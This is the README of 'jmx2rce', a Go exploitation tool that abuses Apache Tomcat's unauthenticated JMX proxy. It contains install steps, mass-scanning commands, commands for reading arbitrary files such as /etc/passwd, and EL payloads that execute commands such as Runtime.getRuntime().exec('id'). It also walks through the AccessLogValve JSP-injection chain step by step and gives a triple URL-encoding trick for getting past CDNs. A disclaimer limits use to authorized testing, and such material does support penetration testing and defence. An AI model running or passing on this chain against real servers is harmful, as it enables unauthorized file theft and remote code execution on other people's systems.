jmx2rce

This tool is for authorized security testing and educational purposes only. Only use against systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. The author is not responsible for any misuse.

Tomcat JMX Proxy to RCE via AccessLogValve Injection

A self-contained exploitation tool that chains Apache Tomcat's unauthenticated JMX proxy endpoint with AccessLogValve reconfiguration to achieve arbitrary file read and remote code execution via Expression Language (EL) injection.

Single static Go binary. No dependencies. Works on macOS, Linux, and Windows.

Requirements

• Go 1.20+ to build from source, or use the prebuilt binary
• No external dependencies (standard library only)

Installation

git clone https://github.com/hacktus/jmx2rce.git
cd jmx2rce/tool
go build -o jmx2rce jmx2rce.go
./jmx2rce -h

Nuclei Template

A nuclei template is included for mass scanning. Detects unauthenticated JMX proxy access and extracts the Tomcat version.

nuclei -t tomcat-jmxproxy-unauth.yaml -l targets.txt

Single host:

nuclei -t tomcat-jmxproxy-unauth.yaml -u https://target.com

Usage

Scan for Vulnerable Hosts

Detect Tomcat instances exposing unauthenticated JMX proxy endpoints.

# Scan a single host
jmx2rce scan -H target.com

# Scan from a file with 50 threads
jmx2rce scan -f targets.txt -t 50

# Save results as JSON
jmx2rce scan -f targets.txt -o results.json

# Verbose output for debugging
jmx2rce -v scan -H target.com

Arbitrary File Read

Read arbitrary files from the server by reconfiguring the ROOT webapp's docBase.

# Read /etc/passwd
jmx2rce read -H target.com -p /etc/passwd

# Read Tomcat configuration
jmx2rce read -H target.com -p /opt/tomcat/conf/server.xml

Remote Code Execution

Full RCE chain via AccessLogValve JSP injection with EL payload.

# Default proof-of-concept payload (evaluates 7*7*7 and leaks server info)
jmx2rce rce -H target.com

# Custom EL payload
jmx2rce rce -H target.com -payload '${System.getProperty("user.name")}'

# Runtime command execution (Tomcat 9+ with EL 3.0)
jmx2rce rce -H target.com -payload '${Runtime.getRuntime().exec("id")}'

Cleanup

Restore original server configuration after testing.

jmx2rce cleanup -H target.com

# If the original docBase was different from ROOT
jmx2rce cleanup -H target.com -docbase /opt/tomcat/webapps/ROOT

Global Options

-q              Suppress banner and non-essential output
-v              Full request/response logging
-verify         Enable SSL certificate verification (disabled by default)
-scheme string  URL scheme: http or https (default: https)
-header NAME:VALUE  Add custom header to all requests (repeatable)
-no-color       Disable colored output

Attack Chain Explanation

Phase 1: Discovery (scan)

The tool sends a GET request to /manager/jmxproxy/?get=Catalina:type=Server&att=serverInfo. If the JMX proxy is exposed without authentication, Tomcat returns the server version in an OK - ... response. No authentication = full JMX read/write access to all registered MBeans.

Phase 2: Arbitrary File Read (read)

1. Save the current docBase attribute of the ROOT WebModule MBean
2. Set docBase to the directory containing the target file (e.g., /etc)
3. Reload the ROOT context so Tomcat serves files from the new directory
4. GET /{filename} to read the target file (e.g., /passwd)
5. Restore the original docBase and reload

Phase 3: Remote Code Execution (rce)

1. Set relaxedQueryChars on the HTTPS Connector MBean to allow {} in URLs (needed for EL syntax in some configurations)
2. Reconfigure AccessLogValve MBean:
   • directory = webapps/ROOT (write logs into the web root)
   • prefix = pwned_{timestamp} (unique filename)
   • suffix = .jsp (Tomcat will compile and execute it)
   • pattern = %{X-Payload}i (log the value of the X-Payload request header)
   • rotatable = false, buffered = false (immediate write)
3. Invoke rotate() on the AccessLogValve to open the new .jsp log file
4. Set ROOT docBase to webapps/ROOT and reload context
5. Send a trigger request with the EL payload in the X-Payload header -- this gets written to the JSP file via the access log
6. Access the JSP file -- Tomcat compiles and evaluates the EL expressions, returning the result

URL Encoding for CDN Traversal

The %{X-Payload}i AccessLogValve pattern token contains %, {, and } which get mangled by CDNs and reverse proxies. The tool uses triple-encoding:

Target value:     %{X-Payload}i
URL parameter:    %2525%257BX-Payload%257Di

Decoding chain:
  CDN layer:      %2525 -> %25,  %257B -> %7B,  %257D -> %7D
  Tomcat layer:   %25   -> %,    %7B   -> {,    %7D   -> }
  Final value:    %{X-Payload}i

Phase 4: Cleanup (cleanup)

Restores all modified MBean attributes to their default values:

• AccessLogValve: logs/, localhost_access_log, .txt, common pattern
• ROOT docBase: ROOT
• Connector: clears relaxedQueryChars

Example Output

Scan

$ jmx2rce scan -H vulnerable-target.example.com -timeout 10

     _____ __  ____  ___  ____  ________
    / /  |/  |/ /\ \/ / |/ _ \/ ___/ __/
 __/ / /|_/ /> <  )  /| / , _/ /__/ _/
/___/_/  /_/_/|_/_/|_|_/_/|_|\___/___/

Tomcat JMX Proxy → RCE via AccessLogValve Injection
By: hacktus

[*] Scanning 1 host(s) with 20 threads, timeout 10s
[+] vulnerable-target.example.com - VULNERABLE - Apache Tomcat/10.1.8

[+] Found 1 vulnerable host(s):
  vulnerable-target.example.com - Apache Tomcat/10.1.8

Legal Disclaimer

This tool is provided for authorized security testing and research purposes only. You must have explicit written permission from the system owner before using this tool against any target. Unauthorized access to computer systems is illegal.

The author assumes no liability for misuse of this tool. By using jmx2rce, you agree to:

• Only test systems you own or have explicit authorization to test
• Follow all applicable laws and regulations
• Report any vulnerabilities found through responsible disclosure

Credits

• Author: hacktus
• Technique: AccessLogValve JSP injection via JMX Proxy is a well-documented Tomcat attack vector. This tool automates the full chain including CDN-safe URL encoding.